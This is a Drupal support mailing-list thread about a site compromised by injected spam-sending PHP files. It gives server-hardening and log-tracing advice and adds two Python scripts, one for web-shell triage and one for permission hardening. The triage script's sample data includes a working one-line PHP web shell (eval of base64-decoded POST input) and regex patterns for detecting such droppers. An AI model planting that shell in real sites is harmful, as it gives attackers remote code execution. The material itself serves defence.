<div dir="ltr">Looks like they were at least able to break into the web server layer and inject server-executable files. It was probably an automated script. So maybe they did not get hold of server-level access or database access. Still, the break-in could have happened from many angles, not just Drupal (the web application).<div><br></div><div>1. You need to secure your entire server stack:</div><div>- Operating system (did you update for the Shellshock bug?)</div><div> - What's your OS? You should ask this in that OS's security forum also.<br><div class="gmail_extra"> - How strong is your password? Do you allow remote root access?</div><div class="gmail_extra"><br></div><div class="gmail_extra">- Web server</div><div class="gmail_extra"> - Subdomains, ports... do you have any "private testing" subdomains that might have lower security? Exposed buggy code?</div><div class="gmail_extra"><br></div><div class="gmail_extra">- Database</div><div class="gmail_extra"> - Do you allow remote access?</div><div class="gmail_extra"> - Password strength?</div><div class="gmail_extra"> - How many human users have access?</div><div class="gmail_extra"><br></div><div class="gmail_extra"><div>- Do all applications share the same credentials to the database?<br></div><div>-- If there's an SQL injection hole in one web app, the attacker might have used the shared password to gain access to Drupal. So you have to isolate all apps with individual, restricted credentials.</div><div>-- Are there any DB user credentials with global privileges? Apps using that kind of privilege are suspect.</div><div><br></div><div>- What other non-standard server applications did you install?<div><br></div><div>- What other web applications did you install?</div><div>-- Use strong htpasswd password screens to restrict access to every web-facing application. Things like phpMyAdmin can have vulnerabilities that haven't even been published.
Even without a password, some applications can grant access to data and database credentials.</div></div><div><br></div><div>- How about file permissions? Did you ever do chmod 777 anywhere (especially web folders)? That would allow anyone write access to that file/folder, so they can inject a shell script and run commands.</div><div><br></div><div>- Drupal itself:</div><div>-- Did you write any custom code?</div><div>-- Did you install any third-party modules, themes, etc.?</div><div><br></div><div>- PHP</div><div>-- You need to secure your PHP by disabling dangerous functions, etc.</div><div><br></div><div>2. The above are all considerations for just your machine. The attack could also have come from another machine that has privileged access to your server.</div><div><br></div><div>- Do an nmap. See what ports are available to the internet. Remove everything that's not essential, secure everything else.</div><div><br></div><div>3. If your server was used for spamming, it's probably blacklisted; check with Senderscore, Spamhaus, etc. Use <a href="http://emailsecuritygrader.com">emailsecuritygrader.com</a> etc. to check all your domains.</div><div><br></div><div>4. You need to trace back to when the files were modified and when the attacker gained access. Check ssh logs, httpd logs, mail logs, git logs, etc. Maybe your server host can help to pinpoint suspicious traffic.</div><div><br></div><div>So I'd first trace back to the first scanning attempts by the attacker. That might give you a clue as to how he eventually succeeded. Perhaps he used a consistent group of IPs that you can pull out from your logs.</div><div><br><div>Best Regards</div><div>Alex</div><div><br></div></div>
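<div>An added example, not part of Alex's reply and not code from Drupal: a small Python triage script for the trace-back in point 4 above, built around the two injected files the original report names. It flags PHP files that sit where no PHP belongs or that carry dropper patterns (base64_decode, eval, long base64 blobs), then walks Apache combined-format log lines to find, for every IP that ever hit such a file, when it was first seen, when it first reached the shell, and what it probed before that. The docroot, file contents, log lines and IP addresses are constructed sample data; the pattern list and the directory lists are the example's own assumptions about a stock Drupal 7 layout.</div>

```python
"""Triage for a suspected PHP web-shell injection on a Drupal docroot. Added example, not
code from this thread or from Drupal. Uses a constructed docroot and constructed Apache
log lines so it runs offline; point the two functions at a real docroot and access log."""
import base64
import os
import re
import tempfile
from collections import defaultdict
from datetime import datetime

# Indicators of obfuscated droppers like the base64_decode files in the report. Heuristics:
# core/contrib can legitimately contain some, so a hit means "inspect", not "compromised".
SHELL_PATTERNS = [
    ("base64_decode", re.compile(rb"base64_decode\s*\(")),
    ("eval", re.compile(rb"\beval\s*\(")),
    ("preg_replace /e", re.compile(rb"preg_replace\s*\([^)]*/e")),  # /e executes the replacement
    ("long base64 blob", re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")),
]
NO_PHP_DIRS = ("sites/default/files", "sites/all/libraries")  # assumption: stock D7 layout
ASSET_DIRS = {"js", "css", "images", "img", "fonts"}           # PHP here (modules/panels/js) is odd
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def find_suspect_php(docroot):
    """[(relative_path, reasons, mtime)] for .php files that look injected, oldest first."""
    hits = []
    for dirpath, _, filenames in os.walk(docroot):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot).replace(os.sep, "/")
            reasons = []
            if rel.startswith(NO_PHP_DIRS):
                reasons.append("php in non-code directory")
            if any(part in ASSET_DIRS for part in rel.split("/")[:-1]):
                reasons.append("php in asset directory")
            with open(full, "rb") as fh:
                body = fh.read()
            matched = [label for label, rx in SHELL_PATTERNS if rx.search(body)]
            if matched:
                reasons.append("obfuscation: " + ", ".join(matched))
            if reasons:
                hits.append((rel, reasons, os.path.getmtime(full)))
    return sorted(hits, key=lambda h: h[2])

def parse_log(lines):
    """Yield dicts for combined-format lines; unparseable lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec

def attacker_timeline(log_lines, suspect_paths):
    """For each IP that ever requested a suspect file (log assumed in time order): first
    appearance, first shell hit, and every request before that hit, i.e. its scanning."""
    first_seen, first_shell, prior = {}, {}, defaultdict(list)
    for rec in parse_log(log_lines):
        ip, path = rec["ip"], rec["path"].split("?", 1)[0]
        first_seen.setdefault(ip, rec["ts"])
        if any(path.endswith("/" + s) for s in suspect_paths):
            first_shell.setdefault(ip, rec["ts"])
        elif ip not in first_shell:
            prior[ip].append((rec["ts"], rec["status"], path))
    return {ip: {"first_seen": first_seen[ip], "first_shell_hit": ts, "probing": prior[ip]}
            for ip, ts in first_shell.items()}

def build_sample_docroot():
    """Constructed sample: one legitimate file plus the two injected files named in the report."""
    root = tempfile.mkdtemp(prefix="drupal_triage_")
    blob = base64.b64encode(b"A" * 180)  # 240-char payload, as droppers carry
    files = {
        "index.php": b"<?php\nrequire_once 'includes/bootstrap.inc';\n",
        "modules/panels/js/css76.php": b"<?php $x=\"" + blob + b"\"; eval(base64_decode($x)); ?>",
        "sites/all/libraries/jquery.cycle/session.php": b"<?php @eval(base64_decode($_POST['c'])); ?>",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    return root

# Constructed log lines (RFC 5737 addresses): a normal visitor, a scanner that probes and
# then drives css76.php, and an IP that only ever posts to session.php.
SAMPLE_LOG = """\
198.51.100.7 - - [20/Oct/2014:03:12:01 +0000] "GET /user/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Oct/2014:22:40:13 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "python-requests/2.4"
203.0.113.9 - - [21/Oct/2014:22:40:14 +0000] "GET /sites/default/settings.php HTTP/1.1" 403 199 "-" "python-requests/2.4"
203.0.113.9 - - [22/Oct/2014:01:05:30 +0000] "POST /modules/panels/js/css76.php HTTP/1.1" 200 12 "-" "python-requests/2.4"
192.0.2.55 - - [23/Oct/2014:09:00:00 +0000] "POST /sites/all/libraries/jquery.cycle/session.php?c=1 HTTP/1.1" 200 12 "-" "curl/7.38"
""".splitlines()

if __name__ == "__main__":
    hits = find_suspect_php(build_sample_docroot())
    for rel, reasons, mtime in hits:
        print(datetime.fromtimestamp(mtime).isoformat(), rel, "|", "; ".join(reasons))
    for ip, info in attacker_timeline(SAMPLE_LOG, [h[0] for h in hits]).items():
        print(ip, info)
```

<div>Hits are heuristics: compare against a clean copy of core and contrib before deleting anything, copy the logs and preserve mtimes before touching the box, and remember the access log only shows the web path; the ssh, mail and git logs Alex lists need the same first-seen treatment, and the scanner's pre-shell requests are where the actual entry point usually shows up.</div>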
<br><div class="gmail_quote">On 29 October 2014 17:12, Naveen Valecha <span dir="ltr"><<a href="mailto:er.naveenvalecha@gmail.com" target="_blank">er.naveenvalecha@gmail.com</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><div dir="ltr">For more about securing file permissions<br><a href="https://www.drupal.org/node/244924" target="_blank">https://www.drupal.org/node/244924</a><br></div><div class="gmail_extra"><br><div class="gmail_quote"><div><div class="h5">On Wed, Oct 29, 2014 at 1:25 PM, Don <span dir="ltr"><<a href="mailto:donald@fane.com" target="_blank">donald@fane.com</a>></span> wrote:<br></div></div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><div><div class="h5">
<div bgcolor="#FFFFFF" text="#000000">
<div>In addition to updating core and contributed modules, I'd look at
how permissions are set up too.<br>
Since I don't update from the admin panel, the only files that can
be added or changed are in /sites/default/files. You could
probably make this harder to figure out by changing the names a
bit.<br>
<br>
I run the Apache web server under user 'apache2' and give write
permissions only in those directories. The other files are owned
by a user and a team group account.<br>
<br>
I wonder if you could do some more magic by not letting *.php
files in /sites/default/files be run, but downloaded only?<br>
<br>
-- <br>
-Don Pickerel-<br>
Fane Software<br>
<div><div><br>
<br>
On 10/29/2014 3:17 AM, Ahilan Rajan wrote:<br>
</div></div></div><div><div>
<blockquote type="cite">
<div dir="ltr">
<div class="gmail_quote">Hi,<br>
<br>
I had installed Drupal 7.21 to run a simple website on my server. All
seemed well till one day last week I started getting a huge amount of
spam email from the server which was hosting the website.<br>
<br>
On further analysis of the postfix mail queue on the server, I found
all the emails were generated by TWO php files (css76.php in the
modules/panels/js directory and session.php in the
sites/all/libraries/jquery.cycle directory). These two files were
NEWLY created/injected files and seemed bogus, containing a number of
symbols along with a base64_decode return statement.<br>
<br>
Clearly my Drupal setup had been hacked and someone had successfully
injected these files to send spam email (amongst other things I
presume).<br>
<br>
I shut down the site, installed the Security Review and Hacked
modules and carried out their recommendations, and also checked my file
permissions via recommended scripts.<br>
<br>
However I am still not sure what the entry point for this hack was in
my setup and whether I am fully secure yet in this setup. Any
suggestions or points in this regard would be highly appreciated.<br>
<br>
thanks<br>
Drupal Newbie<br>
</div>
<br>
</div>
<br>
<br>
</blockquote>
<br>
<br>
</div></div></div>
<br></div></div><span class="">--<br>
[ Drupal support list | <a href="http://lists.drupal.org/" target="_blank">http://lists.drupal.org/</a> ]<br></span></blockquote></div><span class=""><br><br clear="all"><br>-- <br><div dir="ltr"><div style="color:rgb(34,34,34);font-family:arial,sans-serif;font-size:13px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:normal;text-align:start;text-indent:0px;text-transform:none;white-space:normal;word-spacing:0px">Naveen valecha<br></div><div style="color:rgb(34,34,34);font-family:arial,sans-serif;font-size:13px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:normal;text-align:start;text-indent:0px;text-transform:none;white-space:normal;word-spacing:0px">Web : <a href="http://valechatech.com/" target="_blank">http://valechatech.com</a><br></div><div style="color:rgb(34,34,34);font-family:arial,sans-serif;font-size:13px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:normal;text-align:start;text-indent:0px;text-transform:none;white-space:normal;word-spacing:0px">Twitter: <a href="http://twitter.com/NaveenValechaNV" target="_blank">http://twitter.com/NaveenValechaNV</a></div></div>
</span></div>
</blockquote></div><br></div></div></div>
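<div>An added example for Don's permission model and the drupal.org permissions page Naveen links (not Drupal's own fix-permissions script and not code from anyone in the thread): a Python script that lists world-writable paths (the chmod 777 Alex asks about), computes a read-only plan for the code tree with write access only under sites/default/files, applies it, and drops a no-execute .htaccess into that directory so an uploaded *.php is downloaded rather than run. The sample tree is constructed; the single-site layout, the user and group names mentioned in the comments, and the Apache/mod_php assumptions behind the .htaccess are the example's own.</div>

```python
"""Permission hardening for a Drupal 7 docroot: the web server may write only under
sites/default/files (Don's model), using the owner/group/mode scheme of the drupal.org
permissions page linked in the thread. Added example, not Drupal's own fix-permissions
script. Assumptions: single-site layout; the code is owned by a deploy user, with the web
server's group as group owner (both ids are passed in by the caller, see __main__)."""
import os
import stat
import tempfile

DIR_MODE, FILE_MODE = 0o750, 0o640    # code: owner rwx/rw, web-server group read-only
WDIR_MODE, WFILE_MODE = 0o770, 0o660  # upload dir: web-server group may write
WRITABLE_DIRS = ("sites/default/files",)

# Don's idea: whatever lands in the writable directory is served as a download, never run.
# Modelled on the .htaccess Drupal 7 itself creates there; assumes Apache with mod_php and
# AllowOverride permitting Options and FileInfo (otherwise put the same rules in the vhost).
FILES_HTACCESS = """\
Options None
Options +FollowSymLinks
SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006
<Files *>
  SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006
</Files>
<IfModule mod_php5.c>
  php_flag engine off
</IfModule>
"""

def _rel(full, docroot):
    return os.path.relpath(full, docroot).replace(os.sep, "/")

def _writable(rel):
    return any(rel == w or rel.startswith(w + "/") for w in WRITABLE_DIRS)

def world_writable(docroot):
    """Paths any local user can write to: the chmod 777 Alex asks about."""
    bad = []
    for dirpath, _, filenames in os.walk(docroot):
        for full in [dirpath] + [os.path.join(dirpath, n) for n in filenames]:
            if os.stat(full).st_mode & stat.S_IWOTH:
                bad.append(_rel(full, docroot))
    return sorted(bad)

def plan_modes(docroot):
    """{relative_path: mode} for everything under docroot. Pure: review or diff the plan
    against the live modes before apply_plan() touches anything."""
    plan = {}
    for dirpath, _, filenames in os.walk(docroot):
        rel_dir = _rel(dirpath, docroot)
        w = _writable(rel_dir)
        plan[rel_dir] = WDIR_MODE if w else DIR_MODE
        for name in filenames:
            plan[name if rel_dir == "." else rel_dir + "/" + name] = WFILE_MODE if w else FILE_MODE
    return plan

def apply_plan(docroot, plan, uid=-1, gid=-1):
    """chown (when an id is given; -1 leaves it alone) and chmod per plan; returns modes changed."""
    changed = 0
    for rel, mode in plan.items():
        full = docroot if rel == "." else os.path.join(docroot, rel)
        if uid != -1 or gid != -1:
            os.chown(full, uid, gid)
        if stat.S_IMODE(os.stat(full).st_mode) != mode:
            os.chmod(full, mode)
            changed += 1
    return changed

def ensure_files_htaccess(docroot):
    """Create the no-execute .htaccess in the upload directory if it is missing."""
    path = os.path.join(docroot, *WRITABLE_DIRS[0].split("/"), ".htaccess")
    if not os.path.exists(path):
        with open(path, "w") as fh:
            fh.write(FILES_HTACCESS)
        os.chmod(path, WFILE_MODE)
    return path

def build_sample_docroot():
    """Constructed sample tree containing one world-writable directory, the classic mistake."""
    root = tempfile.mkdtemp(prefix="drupal_perms_")
    for rel in ("index.php", "modules/panels/panels.module",
                "sites/default/settings.php", "sites/default/files/logo.png"):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
    for dirpath, _, filenames in os.walk(root):  # fixed starting modes, whatever the umask
        os.chmod(dirpath, 0o755)
        for n in filenames:
            os.chmod(os.path.join(dirpath, n), 0o644)
    os.chmod(os.path.join(root, "modules", "panels"), 0o777)
    return root

if __name__ == "__main__":
    root = build_sample_docroot()
    print("world-writable before:", world_writable(root))
    # Real host: apply_plan(root, plan, pwd.getpwnam("drupal").pw_uid, grp.getgrnam("www-data").gr_gid)
    print("modes changed:", apply_plan(root, plan_modes(root)))
    ensure_files_htaccess(root)
    print("world-writable after:", world_writable(root))
```

<div>Run plan_modes() first and diff it against the live modes; on the real host pass the deploy user's uid and the web server's gid to apply_plan(). Under PHP-FPM the php_flag line is skipped by the IfModule guard, so make sure the SetHandler override is honoured or put an equivalent block in the vhost config. Note that the injected files in this thread sat in modules/ and sites/all/libraries/, not in the files directory: the read-only code tree is what blocks that, the .htaccess only covers uploads.</div>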